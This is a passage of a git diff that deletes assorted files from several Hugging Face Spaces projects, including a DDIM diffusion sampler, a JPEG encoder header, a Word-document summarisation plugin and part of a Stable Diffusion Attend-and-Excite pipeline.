as np -from tqdm import tqdm - -from ldm.modules.diffusionmodules.util import make_ddim_sampling_parameters, make_ddim_timesteps, noise_like, \ - extract_into_tensor - - -class DDIMSampler(object): - def __init__(self, model, schedule="linear", **kwargs): - super().__init__() - self.model = model - self.ddpm_num_timesteps = model.num_timesteps - self.schedule = schedule - - def register_buffer(self, name, attr): - if type(attr) == torch.Tensor: - if attr.device != torch.device("cuda"): - attr = attr.to(torch.device("cuda")) - setattr(self, name, attr) - - def make_schedule(self, ddim_num_steps, ddim_discretize="uniform", ddim_eta=0., verbose=True): - self.ddim_timesteps = make_ddim_timesteps(ddim_discr_method=ddim_discretize, num_ddim_timesteps=ddim_num_steps, - num_ddpm_timesteps=self.ddpm_num_timesteps, verbose=verbose) - alphas_cumprod = self.model.alphas_cumprod - assert alphas_cumprod.shape[0] == self.ddpm_num_timesteps, 'alphas have to be defined for each timestep' - to_torch = lambda x: x.clone().detach().to(torch.float32).to(self.model.device) - - self.register_buffer('betas', to_torch(self.model.betas)) - self.register_buffer('alphas_cumprod', 
to_torch(alphas_cumprod)) - self.register_buffer('alphas_cumprod_prev', to_torch(self.model.alphas_cumprod_prev)) - - # calculations for diffusion q(x_t | x_{t-1}) and others - self.register_buffer('sqrt_alphas_cumprod', to_torch(np.sqrt(alphas_cumprod.cpu()))) - self.register_buffer('sqrt_one_minus_alphas_cumprod', to_torch(np.sqrt(1. - alphas_cumprod.cpu()))) - self.register_buffer('log_one_minus_alphas_cumprod', to_torch(np.log(1. - alphas_cumprod.cpu()))) - self.register_buffer('sqrt_recip_alphas_cumprod', to_torch(np.sqrt(1. / alphas_cumprod.cpu()))) - self.register_buffer('sqrt_recipm1_alphas_cumprod', to_torch(np.sqrt(1. / alphas_cumprod.cpu() - 1))) - - # ddim sampling parameters - ddim_sigmas, ddim_alphas, ddim_alphas_prev = make_ddim_sampling_parameters(alphacums=alphas_cumprod.cpu(), - ddim_timesteps=self.ddim_timesteps, - eta=ddim_eta, verbose=verbose) - self.register_buffer('ddim_sigmas', ddim_sigmas) - self.register_buffer('ddim_alphas', ddim_alphas) - self.register_buffer('ddim_alphas_prev', ddim_alphas_prev) - self.register_buffer('ddim_sqrt_one_minus_alphas', np.sqrt(1. - ddim_alphas)) - sigmas_for_original_sampling_steps = ddim_eta * torch.sqrt( - (1 - self.alphas_cumprod_prev) / (1 - self.alphas_cumprod) * ( - 1 - self.alphas_cumprod / self.alphas_cumprod_prev)) - self.register_buffer('ddim_sigmas_for_original_num_steps', sigmas_for_original_sampling_steps) - - @torch.no_grad() - def sample(self, - S, - batch_size, - shape, - conditioning=None, - callback=None, - normals_sequence=None, - img_callback=None, - quantize_x0=False, - eta=0., - mask=None, - x0=None, - temperature=1., - noise_dropout=0., - score_corrector=None, - corrector_kwargs=None, - verbose=True, - x_T=None, - log_every_t=100, - unconditional_guidance_scale=1., - unconditional_conditioning=None, - features_adapter=None, - append_to_context=None, - cond_tau=0.4, - style_cond_tau=1.0, - # this has to come in the same format as the conditioning, # e.g. as encoded tokens, ... 
- **kwargs - ): - if conditioning is not None: - if isinstance(conditioning, dict): - cbs = conditioning[list(conditioning.keys())[0]].shape[0] - if cbs != batch_size: - print(f"Warning: Got {cbs} conditionings but batch-size is {batch_size}") - else: - if conditioning.shape[0] != batch_size: - print(f"Warning: Got {conditioning.shape[0]} conditionings but batch-size is {batch_size}") - - self.make_schedule(ddim_num_steps=S, ddim_eta=eta, verbose=verbose) - # sampling - C, H, W = shape - size = (batch_size, C, H, W) - print(f'Data shape for DDIM sampling is {size}, eta {eta}') - - samples, intermediates = self.ddim_sampling(conditioning, size, - callback=callback, - img_callback=img_callback, - quantize_denoised=quantize_x0, - mask=mask, x0=x0, - ddim_use_original_steps=False, - noise_dropout=noise_dropout, - temperature=temperature, - score_corrector=score_corrector, - corrector_kwargs=corrector_kwargs, - x_T=x_T, - log_every_t=log_every_t, - unconditional_guidance_scale=unconditional_guidance_scale, - unconditional_conditioning=unconditional_conditioning, - features_adapter=features_adapter, - append_to_context=append_to_context, - cond_tau=cond_tau, - style_cond_tau=style_cond_tau, - ) - return samples, intermediates - - @torch.no_grad() - def ddim_sampling(self, cond, shape, - x_T=None, ddim_use_original_steps=False, - callback=None, timesteps=None, quantize_denoised=False, - mask=None, x0=None, img_callback=None, log_every_t=100, - temperature=1., noise_dropout=0., score_corrector=None, corrector_kwargs=None, - unconditional_guidance_scale=1., unconditional_conditioning=None, features_adapter=None, - append_to_context=None, cond_tau=0.4, style_cond_tau=1.0): - device = self.model.betas.device - b = shape[0] - if x_T is None: - img = torch.randn(shape, device=device) - else: - img = x_T - - if timesteps is None: - timesteps = self.ddpm_num_timesteps if ddim_use_original_steps else self.ddim_timesteps - elif timesteps is not None and not ddim_use_original_steps: - subset_end = int(min(timesteps / self.ddim_timesteps.shape[0], 1) * self.ddim_timesteps.shape[0]) - 1 - timesteps = self.ddim_timesteps[:subset_end] - - intermediates = {'x_inter': [img], 'pred_x0': [img]} - time_range = reversed(range(0, timesteps)) if ddim_use_original_steps else np.flip(timesteps) - total_steps = timesteps if ddim_use_original_steps else timesteps.shape[0] - print(f"Running DDIM Sampling with {total_steps} timesteps") - - iterator = tqdm(time_range, desc='DDIM Sampler', total=total_steps) - - for i, step in enumerate(iterator): - index = total_steps - i - 1 - ts = torch.full((b,), step, device=device, dtype=torch.long) - - if mask is not None: - assert x0 is not None - img_orig = self.model.q_sample(x0, ts) # TODO: deterministic forward pass? - img = img_orig * mask + (1. 
- mask) * img - - outs = self.p_sample_ddim(img, cond, ts, index=index, use_original_steps=ddim_use_original_steps, - quantize_denoised=quantize_denoised, temperature=temperature, - noise_dropout=noise_dropout, score_corrector=score_corrector, - corrector_kwargs=corrector_kwargs, - unconditional_guidance_scale=unconditional_guidance_scale, - unconditional_conditioning=unconditional_conditioning, - features_adapter=None if index < int( - (1 - cond_tau) * total_steps) else features_adapter, - append_to_context=None if index < int( - (1 - style_cond_tau) * total_steps) else append_to_context, - ) - img, pred_x0 = outs - if callback: callback(i) - if img_callback: img_callback(pred_x0, i) - - if index % log_every_t == 0 or index == total_steps - 1: - intermediates['x_inter'].append(img) - intermediates['pred_x0'].append(pred_x0) - - return img, intermediates - - @torch.no_grad() - def p_sample_ddim(self, x, c, t, index, repeat_noise=False, use_original_steps=False, quantize_denoised=False, - temperature=1., noise_dropout=0., score_corrector=None, corrector_kwargs=None, - unconditional_guidance_scale=1., unconditional_conditioning=None, features_adapter=None, - append_to_context=None): - b, *_, device = *x.shape, x.device - - if unconditional_conditioning is None or unconditional_guidance_scale == 1.: - if append_to_context is not None: - model_output = self.model.apply_model(x, t, torch.cat([c, append_to_context], dim=1), - features_adapter=features_adapter) - else: - model_output = self.model.apply_model(x, t, c, features_adapter=features_adapter) - else: - x_in = torch.cat([x] * 2) - t_in = torch.cat([t] * 2) - if isinstance(c, dict): - assert isinstance(unconditional_conditioning, dict) - c_in = dict() - for k in c: - if isinstance(c[k], list): - c_in[k] = [torch.cat([ - unconditional_conditioning[k][i], - c[k][i]]) for i in range(len(c[k]))] - else: - c_in[k] = torch.cat([ - unconditional_conditioning[k], - c[k]]) - elif isinstance(c, list): - c_in = list() - assert isinstance(unconditional_conditioning, list) - for i in range(len(c)): - c_in.append(torch.cat([unconditional_conditioning[i], c[i]])) - else: - if append_to_context is not None: - pad_len = append_to_context.size(1) - new_unconditional_conditioning = torch.cat( - [unconditional_conditioning, unconditional_conditioning[:, -pad_len:, :]], dim=1) - new_c = torch.cat([c, append_to_context], dim=1) - c_in = torch.cat([new_unconditional_conditioning, new_c]) - else: - c_in = torch.cat([unconditional_conditioning, c]) - model_uncond, model_t = self.model.apply_model(x_in, t_in, c_in, features_adapter=features_adapter).chunk(2) - model_output = model_uncond + unconditional_guidance_scale * (model_t - model_uncond) - - if self.model.parameterization == "v": - e_t = self.model.predict_eps_from_z_and_v(x, t, model_output) - else: - e_t = model_output - - if score_corrector is not None: - assert self.model.parameterization == "eps", 'not implemented' - e_t = score_corrector.modify_score(self.model, e_t, x, t, c, **corrector_kwargs) - - alphas = self.model.alphas_cumprod if use_original_steps else self.ddim_alphas - alphas_prev = self.model.alphas_cumprod_prev if use_original_steps else self.ddim_alphas_prev - sqrt_one_minus_alphas = self.model.sqrt_one_minus_alphas_cumprod if use_original_steps else self.ddim_sqrt_one_minus_alphas - sigmas = self.model.ddim_sigmas_for_original_num_steps if use_original_steps else self.ddim_sigmas - # select parameters corresponding to the currently considered timestep - a_t = torch.full((b, 1, 1, 1), 
alphas[index], device=device) - a_prev = torch.full((b, 1, 1, 1), alphas_prev[index], device=device) - sigma_t = torch.full((b, 1, 1, 1), sigmas[index], device=device) - sqrt_one_minus_at = torch.full((b, 1, 1, 1), sqrt_one_minus_alphas[index], device=device) - - # current prediction for x_0 - if self.model.parameterization != "v": - pred_x0 = (x - sqrt_one_minus_at * e_t) / a_t.sqrt() - else: - pred_x0 = self.model.predict_start_from_z_and_v(x, t, model_output) - - if quantize_denoised: - pred_x0, _, *_ = self.model.first_stage_model.quantize(pred_x0) - # direction pointing to x_t - dir_xt = (1. - a_prev - sigma_t ** 2).sqrt() * e_t - noise = sigma_t * noise_like(x.shape, device, repeat_noise) * temperature - if noise_dropout > 0.: - noise = torch.nn.functional.dropout(noise, p=noise_dropout) - x_prev = a_prev.sqrt() * pred_x0 + dir_xt + noise - return x_prev, pred_x0 - - @torch.no_grad() - def stochastic_encode(self, x0, t, use_original_steps=False, noise=None): - # fast, but does not allow for exact reconstruction - # t serves as an index to gather the correct alphas - if use_original_steps: - sqrt_alphas_cumprod = self.sqrt_alphas_cumprod - sqrt_one_minus_alphas_cumprod = self.sqrt_one_minus_alphas_cumprod - else: - sqrt_alphas_cumprod = torch.sqrt(self.ddim_alphas) - sqrt_one_minus_alphas_cumprod = self.ddim_sqrt_one_minus_alphas - - if noise is None: - noise = torch.randn_like(x0) - return (extract_into_tensor(sqrt_alphas_cumprod, t, x0.shape) * x0 + - extract_into_tensor(sqrt_one_minus_alphas_cumprod, t, x0.shape) * noise) - - @torch.no_grad() - def decode(self, x_latent, cond, t_start, unconditional_guidance_scale=1.0, unconditional_conditioning=None, - use_original_steps=False): - - timesteps = np.arange(self.ddpm_num_timesteps) if use_original_steps else self.ddim_timesteps - timesteps = timesteps[:t_start] - - time_range = np.flip(timesteps) - total_steps = timesteps.shape[0] - print(f"Running DDIM Sampling with {total_steps} timesteps") - - iterator = tqdm(time_range, desc='Decoding image', total=total_steps) - x_dec = x_latent - for i, step in enumerate(iterator): - index = total_steps - i - 1 - ts = torch.full((x_latent.shape[0],), step, device=x_latent.device, dtype=torch.long) - x_dec, _ = self.p_sample_ddim(x_dec, cond, ts, index=index, use_original_steps=use_original_steps, - unconditional_guidance_scale=unconditional_guidance_scale, - unconditional_conditioning=unconditional_conditioning) - return x_dec diff --git a/spaces/AdithyaSNair/Dog_breed_predictor/README.md b/spaces/AdithyaSNair/Dog_breed_predictor/README.md deleted file mode 100644 index 96a9afb4a20da7e5e1d2495240e3209336a4336d..0000000000000000000000000000000000000000 --- a/spaces/AdithyaSNair/Dog_breed_predictor/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Dog Breed Predictor -emoji: 🏆 -colorFrom: indigo -colorTo: green -sdk: streamlit -sdk_version: 1.26.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/plugins/touchcursor-plugin.js b/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/plugins/touchcursor-plugin.js deleted file mode 100644 index 0aba4335bee173e28c40e7fca4b14ea8529f3ac5..0000000000000000000000000000000000000000 --- a/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/plugins/touchcursor-plugin.js +++ /dev/null @@ -1,20 +0,0 @@ -import TouchCursor from './touchcursor.js'; - -class TouchCursorPlugin extends 
Phaser.Plugins.BasePlugin { - - constructor(pluginManager) { - super(pluginManager); - } - - start() { - var eventEmitter = this.game.events; - eventEmitter.on('destroy', this.destroy, this); - } - - add(gameObject, config) { - return new TouchCursor(gameObject, config); - } - -} - -export default TouchCursorPlugin; \ No newline at end of file diff --git a/spaces/Alesteba/NeRF_ficus-pxl/config.py b/spaces/Alesteba/NeRF_ficus-pxl/config.py deleted file mode 100644 index 9f062ebe3532b740155f5f86b93659dcec49d565..0000000000000000000000000000000000000000 --- a/spaces/Alesteba/NeRF_ficus-pxl/config.py +++ /dev/null @@ -1,16 +0,0 @@ -import streamlit as st -import tensorflow as tf -import numpy as np - -# Setting random seed to obtain reproducible results. -tf.random.set_seed(42) - -# Initialize global variables. -AUTO = tf.data.AUTOTUNE -BATCH_SIZE = 1 -NUM_SAMPLES = 32 -POS_ENCODE_DIMS = 16 -EPOCHS = 30 -H = 50 -W = 50 -focal = 0.6911112070083618 \ No newline at end of file diff --git a/spaces/Amon1/ChatGPTForAcadamic/crazy_functions/test_project/cpp/libJPG/jpge.h b/spaces/Amon1/ChatGPTForAcadamic/crazy_functions/test_project/cpp/libJPG/jpge.h deleted file mode 100644 index a46c805ab80aab491f7f9508b3a008b149866bee..0000000000000000000000000000000000000000 --- a/spaces/Amon1/ChatGPTForAcadamic/crazy_functions/test_project/cpp/libJPG/jpge.h +++ /dev/null @@ -1,172 +0,0 @@ - -// jpge.h - C++ class for JPEG compression. -// Public domain, Rich Geldreich -// Alex Evans: Added RGBA support, linear memory allocator. -#ifndef JPEG_ENCODER_H -#define JPEG_ENCODER_H - -#include - -namespace jpge -{ - typedef unsigned char uint8; - typedef signed short int16; - typedef signed int int32; - typedef unsigned short uint16; - typedef unsigned int uint32; - typedef unsigned int uint; - - // JPEG chroma subsampling factors. Y_ONLY (grayscale images) and H2V2 (color images) are the most common. - enum subsampling_t { Y_ONLY = 0, H1V1 = 1, H2V1 = 2, H2V2 = 3 }; - - // JPEG compression parameters structure. - struct params - { - inline params() : m_quality(85), m_subsampling(H2V2), m_no_chroma_discrim_flag(false), m_two_pass_flag(false) { } - - inline bool check_valid() const - { - if ((m_quality < 1) || (m_quality > 100)) return false; - if ((uint)m_subsampling > (uint)H2V2) return false; - return true; - } - - // Quality: 1-100, higher is better. Typical values are around 50-95. - int m_quality; - - // m_subsampling: - // 0 = Y (grayscale) only - // 1 = YCbCr, no subsampling (H1V1, YCbCr 1x1x1, 3 blocks per MCU) - // 2 = YCbCr, H2V1 subsampling (YCbCr 2x1x1, 4 blocks per MCU) - // 3 = YCbCr, H2V2 subsampling (YCbCr 4x1x1, 6 blocks per MCU-- very common) - subsampling_t m_subsampling; - - // Disables CbCr discrimination - only intended for testing. - // If true, the Y quantization table is also used for the CbCr channels. - bool m_no_chroma_discrim_flag; - - bool m_two_pass_flag; - }; - - // Writes JPEG image to a file. - // num_channels must be 1 (Y) or 3 (RGB), image pitch must be width*num_channels. - bool compress_image_to_jpeg_file(const char *pFilename, int64_t width, int64_t height, int64_t num_channels, const uint8 *pImage_data, const params &comp_params = params()); - - // Writes JPEG image to memory buffer. - // On entry, buf_size is the size of the output buffer pointed at by pBuf, which should be at least ~1024 bytes. - // If return value is true, buf_size will be set to the size of the compressed data. 
- bool compress_image_to_jpeg_file_in_memory(void *pBuf, int64_t &buf_size, int64_t width, int64_t height, int64_t num_channels, const uint8 *pImage_data, const params &comp_params = params()); - - // Output stream abstract class - used by the jpeg_encoder class to write to the output stream. - // put_buf() is generally called with len==JPGE_OUT_BUF_SIZE bytes, but for headers it'll be called with smaller amounts. - class output_stream - { - public: - virtual ~output_stream() { }; - virtual bool put_buf(const void* Pbuf, int64_t len) = 0; - template inline bool put_obj(const T& obj) { return put_buf(&obj, sizeof(T)); } - }; - - // Lower level jpeg_encoder class - useful if more control is needed than the above helper functions. - class jpeg_encoder - { - public: - jpeg_encoder(); - ~jpeg_encoder(); - - // Initializes the compressor. - // pStream: The stream object to use for writing compressed data. - // params - Compression parameters structure, defined above. - // width, height - Image dimensions. - // channels - May be 1, or 3. 1 indicates grayscale, 3 indicates RGB source data. - // Returns false on out of memory or if a stream write fails. - bool init(output_stream *pStream, int64_t width, int64_t height, int64_t src_channels, const params &comp_params = params()); - - const params &get_params() const { return m_params; } - - // Deinitializes the compressor, freeing any allocated memory. May be called at any time. - void deinit(); - - uint get_total_passes() const { return m_params.m_two_pass_flag ? 2 : 1; } - inline uint get_cur_pass() { return m_pass_num; } - - // Call this method with each source scanline. - // width * src_channels bytes per scanline is expected (RGB or Y format). - // You must call with NULL after all scanlines are processed to finish compression. - // Returns false on out of memory or if a stream write fails. 
- bool process_scanline(const void* pScanline); - - private: - jpeg_encoder(const jpeg_encoder &); - jpeg_encoder &operator =(const jpeg_encoder &); - - typedef int32 sample_array_t; - - output_stream *m_pStream; - params m_params; - uint8 m_num_components; - uint8 m_comp_h_samp[3], m_comp_v_samp[3]; - int m_image_x, m_image_y, m_image_bpp, m_image_bpl; - int m_image_x_mcu, m_image_y_mcu; - int m_image_bpl_xlt, m_image_bpl_mcu; - int m_mcus_per_row; - int m_mcu_x, m_mcu_y; - uint8 *m_mcu_lines[16]; - uint8 m_mcu_y_ofs; - sample_array_t m_sample_array[64]; - int16 m_coefficient_array[64]; - int32 m_quantization_tables[2][64]; - uint m_huff_codes[4][256]; - uint8 m_huff_code_sizes[4][256]; - uint8 m_huff_bits[4][17]; - uint8 m_huff_val[4][256]; - uint32 m_huff_count[4][256]; - int m_last_dc_val[3]; - enum { JPGE_OUT_BUF_SIZE = 2048 }; - uint8 m_out_buf[JPGE_OUT_BUF_SIZE]; - uint8 *m_pOut_buf; - uint m_out_buf_left; - uint32 m_bit_buffer; - uint m_bits_in; - uint8 m_pass_num; - bool m_all_stream_writes_succeeded; - - void optimize_huffman_table(int table_num, int table_len); - void emit_byte(uint8 i); - void emit_word(uint i); - void emit_marker(int marker); - void emit_jfif_app0(); - void emit_dqt(); - void emit_sof(); - void emit_dht(uint8 *bits, uint8 *val, int index, bool ac_flag); - void emit_dhts(); - void emit_sos(); - void emit_markers(); - void compute_huffman_table(uint *codes, uint8 *code_sizes, uint8 *bits, uint8 *val); - void compute_quant_table(int32 *dst, int16 *src); - void adjust_quant_table(int32 *dst, int32 *src); - void first_pass_init(); - bool second_pass_init(); - bool jpg_open(int p_x_res, int p_y_res, int src_channels); - void load_block_8_8_grey(int x); - void load_block_8_8(int x, int y, int c); - void load_block_16_8(int x, int c); - void load_block_16_8_8(int x, int c); - void load_quantized_coefficients(int component_num); - void flush_output_buffer(); - void put_bits(uint bits, uint len); - void code_coefficients_pass_one(int component_num); - void code_coefficients_pass_two(int component_num); - void code_block(int component_num); - void process_mcu_row(); - bool terminate_pass_one(); - bool terminate_pass_two(); - bool process_end_of_image(); - void load_mcu(const void* src); - void clear(); - void init(); - }; - -} // namespace jpge - -#endif // JPEG_ENCODER \ No newline at end of file diff --git "a/spaces/Amon1/ChatGPTForAcadamic/crazy_functions/\346\200\273\347\273\223word\346\226\207\346\241\243.py" "b/spaces/Amon1/ChatGPTForAcadamic/crazy_functions/\346\200\273\347\273\223word\346\226\207\346\241\243.py" deleted file mode 100644 index a117fb3c0668457b30e63373c6ab8d85281ee044..0000000000000000000000000000000000000000 --- "a/spaces/Amon1/ChatGPTForAcadamic/crazy_functions/\346\200\273\347\273\223word\346\226\207\346\241\243.py" +++ /dev/null @@ -1,127 +0,0 @@ -from predict import predict_no_ui -from toolbox import CatchException, report_execption, write_results_to_file, predict_no_ui_but_counting_down -fast_debug = False - - -def 解析docx(file_manifest, project_folder, top_p, temperature, chatbot, history, systemPromptTxt): - import time, os - # pip install python-docx 用于docx格式,跨平台 - # pip install pywin32 用于doc格式,仅支持Win平台 - - print('begin analysis on:', file_manifest) - for index, fp in enumerate(file_manifest): - if fp.split(".")[-1] == "docx": - from docx import Document - doc = Document(fp) - file_content = "\n".join([para.text for para in doc.paragraphs]) - else: - import win32com.client - word = win32com.client.Dispatch("Word.Application") - word.visible 
= False - # 打开文件 - print('fp', os.getcwd()) - doc = word.Documents.Open(os.getcwd() + '/' + fp) - # file_content = doc.Content.Text - doc = word.ActiveDocument - file_content = doc.Range().Text - doc.Close() - word.Quit() - - print(file_content) - - prefix = "接下来请你逐文件分析下面的论文文件," if index == 0 else "" - # private_upload里面的文件名在解压zip后容易出现乱码(rar和7z格式正常),故可以只分析文章内容,不输入文件名 - i_say = prefix + f'请对下面的文章片段用中英文做概述,文件名是{os.path.relpath(fp, project_folder)},' \ - f'文章内容是 ```{file_content}```' - i_say_show_user = prefix + f'[{index+1}/{len(file_manifest)}] 假设你是论文审稿专家,请对下面的文章片段做概述: {os.path.abspath(fp)}' - chatbot.append((i_say_show_user, "[Local Message] waiting gpt response.")) - yield chatbot, history, '正常' - - if not fast_debug: - msg = '正常' - # ** gpt request ** - gpt_say = yield from predict_no_ui_but_counting_down(i_say, i_say_show_user, chatbot, top_p, temperature, - history=[]) # 带超时倒计时 - chatbot[-1] = (i_say_show_user, gpt_say) - history.append(i_say_show_user); - history.append(gpt_say) - yield chatbot, history, msg - if not fast_debug: time.sleep(2) - - """ - # 可按需启用 - i_say = f'根据你上述的分析,对全文进行概括,用学术性语言写一段中文摘要,然后再写一篇英文的。' - chatbot.append((i_say, "[Local Message] waiting gpt response.")) - yield chatbot, history, '正常' - - - i_say = f'我想让你做一个论文写作导师。您的任务是使用人工智能工具(例如自然语言处理)提供有关如何改进其上述文章的反馈。' \ - f'您还应该利用您在有效写作技巧方面的修辞知识和经验来建议作者可以更好地以书面形式表达他们的想法和想法的方法。' \ - f'根据你之前的分析,提出建议' - chatbot.append((i_say, "[Local Message] waiting gpt response.")) - yield chatbot, history, '正常' - - """ - - if not fast_debug: - msg = '正常' - # ** gpt request ** - gpt_say = yield from predict_no_ui_but_counting_down(i_say, i_say, chatbot, top_p, temperature, - history=history) # 带超时倒计时 - - chatbot[-1] = (i_say, gpt_say) - history.append(i_say) - history.append(gpt_say) - yield chatbot, history, msg - res = write_results_to_file(history) - chatbot.append(("完成了吗?", res)) - yield chatbot, history, msg - - -@CatchException -def 总结word文档(txt, top_p, temperature, chatbot, history, systemPromptTxt, WEB_PORT): - import glob, os - - # 基本信息:功能、贡献者 - chatbot.append([ - "函数插件功能?", - "批量总结Word文档。函数插件贡献者: JasonGuo1"]) - yield chatbot, history, '正常' - - # 尝试导入依赖,如果缺少依赖,则给出安装建议 - try: - from docx import Document - except: - report_execption(chatbot, history, - a=f"解析项目: {txt}", - b=f"导入软件依赖失败。使用该模块需要额外依赖,安装方法```pip install --upgrade python-docx pywin32```。") - yield chatbot, history, '正常' - return - - # 清空历史,以免输入溢出 - history = [] - - # 检测输入参数,如没有给定输入参数,直接退出 - if os.path.exists(txt): - project_folder = txt - else: - if txt == "": txt = '空空如也的输入栏' - report_execption(chatbot, history, a=f"解析项目: {txt}", b=f"找不到本地项目或无权访问: {txt}") - yield chatbot, history, '正常' - return - - # 搜索需要处理的文件清单 - file_manifest = [f for f in glob.glob(f'{project_folder}/**/*.docx', recursive=True)] + \ - [f for f in glob.glob(f'{project_folder}/**/*.doc', recursive=True)] - # [f for f in glob.glob(f'{project_folder}/**/*.tex', recursive=True)] + \ - # [f for f in glob.glob(f'{project_folder}/**/*.cpp', recursive=True)] + \ - # [f for f in glob.glob(f'{project_folder}/**/*.c', recursive=True)] - - # 如果没找到任何文件 - if len(file_manifest) == 0: - report_execption(chatbot, history, a=f"解析项目: {txt}", b=f"找不到任何.docx或doc文件: {txt}") - yield chatbot, history, '正常' - return - - # 开始正式执行任务 - yield from 解析docx(file_manifest, project_folder, top_p, temperature, chatbot, history, systemPromptTxt) diff --git a/spaces/Amrrs/DragGan-Inversion/stylegan_human/pti/pti_models/e4e/stylegan2/op/upfirdn2d.py 
b/spaces/Amrrs/DragGan-Inversion/stylegan_human/pti/pti_models/e4e/stylegan2/op/upfirdn2d.py deleted file mode 100644 index 6727f2bf0857c1f4e0d50de363de75e7b8d4de50..0000000000000000000000000000000000000000 --- a/spaces/Amrrs/DragGan-Inversion/stylegan_human/pti/pti_models/e4e/stylegan2/op/upfirdn2d.py +++ /dev/null @@ -1,60 +0,0 @@ -import os - -import torch -from torch.nn import functional as F - - -module_path = os.path.dirname(__file__) - - -def upfirdn2d(input, kernel, up=1, down=1, pad=(0, 0)): - out = upfirdn2d_native( - input, kernel, up, up, down, down, pad[0], pad[1], pad[0], pad[1] - ) - - return out - - -def upfirdn2d_native( - input, kernel, up_x, up_y, down_x, down_y, pad_x0, pad_x1, pad_y0, pad_y1 -): - _, channel, in_h, in_w = input.shape - input = input.reshape(-1, in_h, in_w, 1) - - _, in_h, in_w, minor = input.shape - kernel_h, kernel_w = kernel.shape - - out = input.view(-1, in_h, 1, in_w, 1, minor) - out = F.pad(out, [0, 0, 0, up_x - 1, 0, 0, 0, up_y - 1]) - out = out.view(-1, in_h * up_y, in_w * up_x, minor) - - out = F.pad( - out, [0, 0, max(pad_x0, 0), max(pad_x1, 0), - max(pad_y0, 0), max(pad_y1, 0)] - ) - out = out[ - :, - max(-pad_y0, 0): out.shape[1] - max(-pad_y1, 0), - max(-pad_x0, 0): out.shape[2] - max(-pad_x1, 0), - :, - ] - - out = out.permute(0, 3, 1, 2) - out = out.reshape( - [-1, 1, in_h * up_y + pad_y0 + pad_y1, in_w * up_x + pad_x0 + pad_x1] - ) - w = torch.flip(kernel, [0, 1]).view(1, 1, kernel_h, kernel_w) - out = F.conv2d(out, w) - out = out.reshape( - -1, - minor, - in_h * up_y + pad_y0 + pad_y1 - kernel_h + 1, - in_w * up_x + pad_x0 + pad_x1 - kernel_w + 1, - ) - out = out.permute(0, 2, 3, 1) - out = out[:, ::down_y, ::down_x, :] - - out_h = (in_h * up_y + pad_y0 + pad_y1 - kernel_h) // down_y + 1 - out_w = (in_w * up_x + pad_x0 + pad_x1 - kernel_w) // down_x + 1 - - return out.view(-1, channel, out_h, out_w) diff --git a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/pipelines/stable_diffusion/pipeline_stable_diffusion_attend_and_excite.py b/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/pipelines/stable_diffusion/pipeline_stable_diffusion_attend_and_excite.py deleted file mode 100644 index a95015a2b850dcbd1f69b68856cdb2d79e40d767..0000000000000000000000000000000000000000 --- a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/pipelines/stable_diffusion/pipeline_stable_diffusion_attend_and_excite.py +++ /dev/null @@ -1,1020 +0,0 @@ -# Copyright 2023 The HuggingFace Team. All rights reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. 
- -import inspect -import math -import warnings -from typing import Any, Callable, Dict, List, Optional, Tuple, Union - -import numpy as np -import torch -from torch.nn import functional as F -from transformers import CLIPImageProcessor, CLIPTextModel, CLIPTokenizer - -from ...image_processor import VaeImageProcessor -from ...loaders import LoraLoaderMixin, TextualInversionLoaderMixin -from ...models import AutoencoderKL, UNet2DConditionModel -from ...models.attention_processor import Attention -from ...schedulers import KarrasDiffusionSchedulers -from ...utils import logging, randn_tensor, replace_example_docstring -from ..pipeline_utils import DiffusionPipeline -from . import StableDiffusionPipelineOutput -from .safety_checker import StableDiffusionSafetyChecker - - -logger = logging.get_logger(__name__) - -EXAMPLE_DOC_STRING = """ - Examples: - ```py - >>> import torch - >>> from diffusers import StableDiffusionAttendAndExcitePipeline - - >>> pipe = StableDiffusionAttendAndExcitePipeline.from_pretrained( - ... "CompVis/stable-diffusion-v1-4", torch_dtype=torch.float16 - ... ).to("cuda") - - - >>> prompt = "a cat and a frog" - - >>> # use get_indices function to find out indices of the tokens you want to alter - >>> pipe.get_indices(prompt) - {0: '<|startoftext|>', 1: 'a', 2: 'cat', 3: 'and', 4: 'a', 5: 'frog', 6: '<|endoftext|>'} - - >>> token_indices = [2, 5] - >>> seed = 6141 - >>> generator = torch.Generator("cuda").manual_seed(seed) - - >>> images = pipe( - ... prompt=prompt, - ... token_indices=token_indices, - ... guidance_scale=7.5, - ... generator=generator, - ... num_inference_steps=50, - ... max_iter_to_alter=25, - ... ).images - - >>> image = images[0] - >>> image.save(f"../images/{prompt}_{seed}.png") - ``` -""" - - -class AttentionStore: - @staticmethod - def get_empty_store(): - return {"down": [], "mid": [], "up": []} - - def __call__(self, attn, is_cross: bool, place_in_unet: str): - if self.cur_att_layer >= 0 and is_cross: - if attn.shape[1] == np.prod(self.attn_res): - self.step_store[place_in_unet].append(attn) - - self.cur_att_layer += 1 - if self.cur_att_layer == self.num_att_layers: - self.cur_att_layer = 0 - self.between_steps() - - def between_steps(self): - self.attention_store = self.step_store - self.step_store = self.get_empty_store() - - def get_average_attention(self): - average_attention = self.attention_store - return average_attention - - def aggregate_attention(self, from_where: List[str]) -> torch.Tensor: - """Aggregates the attention across the different layers and heads at the specified resolution.""" - out = [] - attention_maps = self.get_average_attention() - for location in from_where: - for item in attention_maps[location]: - cross_maps = item.reshape(-1, self.attn_res[0], self.attn_res[1], item.shape[-1]) - out.append(cross_maps) - out = torch.cat(out, dim=0) - out = out.sum(0) / out.shape[0] - return out - - def reset(self): - self.cur_att_layer = 0 - self.step_store = self.get_empty_store() - self.attention_store = {} - - def __init__(self, attn_res): - """ - Initialize an empty AttentionStore :param step_index: used to visualize only a specific step in the diffusion - process - """ - self.num_att_layers = -1 - self.cur_att_layer = 0 - 